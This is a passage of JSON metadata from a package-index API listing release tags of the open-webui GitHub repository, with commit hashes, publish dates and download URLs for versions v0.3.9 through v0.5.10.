/v0.5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10/manifests"},{"name":"v0.5.9","sha":"ab94468ffa765c9ed169cff3a7caa18e85f434db","kind":"commit","published_at":"2025-02-05T10:38:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9/manifests"},{"name":"v0.5.8","sha":"dc3b2f1f1e60dadfe6ca22e208b0f00d36f6a0f1","kind":"commit","published_at":"2025-02-05T09:16:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8/manifests"},{"name":"v0.5.7","sha":"b72150c881955721a63ae7f4ea1b9ea293816fc1","kind":"commit","published_at":"2025-01-23T21:47:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7/manifests"},{"name":"v0.5.6","sha":"9dd45ddf7c5cea09be434278edf68f3fdb23dcfd","kind":"commit","published_at":"2025-01-22T22:13:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6/manifests"},{"name":"v0.5.5","sha":"568dbc545cdd7e1d08e0db7851bace82db04a418","kind":"commit","published_at":"2025-01-22T19:34:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5/manifests"},{"name":"v0.5.4","sha":"506dc0149ca973e20768fa3d6f171afac289f606","kind":"commit","published_at":"2025-01-05T09:38:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4/manifests"},{"name":"v0.5.3","sha":"4bc9904b3cd0726d3f9c3cbaeade972cf167b6c4","kind":"commit","published_at":"2024-12-31T21:41:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"e42cbf07f5a0c1fea2441e37f36f06510a2a781d","kind":"commit","published_at":"2024-12-27T07:51:49.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"2bdf99b398cf2f5ee3e15672aeecd542a5bf067d","kind":"commit","published_at":"2024-12-26T06:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"22132e155aa7e8522f4c79a7aae4bcfc0d7f6b0d","kind":"commit","published_at":"2024-12-25T18:39:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0/manifests"},{"name":"v0.4.8","sha":"29a271959556743e6deb4d55a5a982983335d7ab","kind":"commit","published_at":"2024-12-07T08:42:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"c4ea31357f49d08a14c86b2bd85fdcd489512e91","kind":"commit","published_at":"2024-12-01T08:42:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"0a26c41c7b58300f37348ba580a4f0d682ca5fbd","kind":"commit","published_at":"2024-11-27T04:24:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6/manifests"},{"name":"v0.4.5","sha":"4831c9e57e35a0619d9212b7b573e2c6a9443c8c","kind":"commit","published_at":"2024-11-26T09:55:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5/manifests"},{"name":"v0.4.4","sha":"db929b5d5ec1694a80ae707a74a52a6dac9f7451","kind":"commit","published_at":"2024-11-23T03:27:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"c13bcfdfc9fcb9b72e516cb72c89f234511c89df","kind":"commit","published_at":"2024-11-22T06:47:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"6f4bc9864c9ca613fc0dae3ba1db3accfe1d1e5e","kind":"commit","published_at":"2024-11-20T20:24:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"02e94c826440162e381cad382d3ac1b0eb2b3d73","kind":"commit","published_at":"2024-11-20T04:17:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"3c334320921caaeac8ec587dc2e227e3a886177c","kind":"commit","published_at":"2024-11-19T22:28:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0/manifests"},{"name":"v0.3.35","sha":"f1f068f458c07909247484b69bcb9a0e96b4eaeb","kind":"commit","published_at":"2024-10-26T20:17:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35/manifests"},{"name":"v0.3.34","sha":"f10c729e3d1a1cfc82be5bf970ac3716649f472e","kind":"commit","published_at":"2024-10-26T07:44:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34/manifests"},{"name":"v0.3.33","sha":"99dd7fb5a836511e02e2a3761aeab75f2e8b5687","kind":"commit","published_at":"2024-10-24T20:36:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33/manifests"},{"name":"v0.3.32","sha":"bc29d5d3c3534c7e42eb3bdf5fa5e11e7a287aaa","kind":"commit","published_at":"2024-10-07T05:06:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32/manifests"},{"name":"v0.3.31","sha":"c8c41e07e96140253eae07746ae24a120f9f33b7","kind":"commit","published_at":"2024-10-07T01:50:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31/manifests"},{"name":"v0.3.30","sha":"7b8f923981b004d6183cd6e4f95b408b613baf9e","kind":"commit","published_at":"2024-09-26T02:13:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30/manifests"},{"name":"v0.3.29","sha":"82cda6e52204f621882df696a4a26cc20ab482a0","kind":"commit","published_at":"2024-09-25T13:46:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29/manifests"},{"name":"v0.3.28","sha":"534e4c90ca5a95d37d325b2e6a54fa36697ee736","kind":"commit","published_at":"2024-09-24T16:52:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28/manifests"},{"name":"v0.3.27","sha":"ba20c71963963e58a012eb3d537af7c6c7a543d2","kind":"commit","published_at":"2024-09-24T16:13:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27/manifests"},{"name":"v0.3.26","sha":"c0738cef26df70a65898bd8e14dbb4c1dc6937a4","kind":"commit","published_at":"2024-09-24T13:41:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26/manifests"},{"name":"v0.3.25","sha":"019cf8199f1f4842b8f61cc3143b782433b55779","kind":"commit","published_at":"2024-09-24T12:07:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25/manifests"},{"name":"v0.3.24","sha":"7ec72679f0c981e577b71d3f3529ce3e8839521d","kind":"commit","published_at":"2024-09-24T11:32:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24/manifests"},{"name":"v0.3.23","sha":"ff8a2da751e4b64441909554965cd51c60f5332a","kind":"commit","published_at":"2024-09-21T02:55:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23/manifests"},{"name":"v0.3.22","sha":"83855b713b0f211144993486ac5265d3d67bb1f8","kind":"commit","published_at":"2024-09-19T22:25:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22/manifests"},{"name":"v0.3.21","sha":"50db51ebe08c018bf46acfaf55985ff998da50bc","kind":"commit","published_at":"2024-09-07T23:59:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21/manifests"},{"name":"v0.3.20","sha":"e2ef36b582b06f1edef0fe84064ce4ae45fa085b","kind":"commit","published_at":"2024-09-07T04:08:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20/manifests"},{"name":"v0.3.19","sha":"05c0423d6eba64c78fbcfeda4059e54160d2fd35","kind":"commit","published_at":"2024-09-05T18:47:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19/manifests"},{"name":"v0.3.18","sha":"9204498420c89e347af13fe53b1d0ddcb6379dfc","kind":"commit","published_at":"2024-09-04T18:09:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18/manifests"},{"name":"v0.3.17","sha":"a9801147b83bfeecc147708941bec1a4b29823cc","kind":"commit","published_at":"2024-09-04T16:40:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17/manifests"},{"name":"v0.3.16","sha":"693dc3107a71e76e50c0f765b83eaa45acfdab87","kind":"commit","published_at":"2024-08-27T16:49:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16/manifests"},{"name":"v0.3.15","sha":"847ca660018fe70dc56d29ef86eeee006684058d","kind":"commit","published_at":"2024-08-21T22:28:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15/manifests"},{"name":"v0.3.14","sha":"8a620cab442ab61b1f80c21d6b68df7b020fb10c","kind":"commit","published_at":"2024-08-21T15:36:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14/manifests"},{"name":"v0.3.13","sha":"13b0e7d64a708f69c5ce58cf0897d9951d0d16ad","kind":"commit","published_at":"2024-08-14T19:45:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13/manifests"},{"name":"v0.3.12","sha":"c869652ef4907dd123a140d9a08a0c239e690b08","kind":"commit","published_at":"2024-08-07T13:22:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12/manifests"},{"name":"v0.3.11","sha":"a58dfccb7dab4c7c42c8b4528f1d330bb1626e5f","kind":"commit","published_at":"2024-08-02T22:03:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"c74e7df6a04ec942af476332f4660f9d2a95fb7e","kind":"commit","published_at":"2024-07-17T15:51:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"6e843ab563c6843aac3fa5bf13056cdd1ebdbaff","kind":"commit","published_at":"2024-07-17T10:18:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.9","tag_url":"https://repos.ecosyste.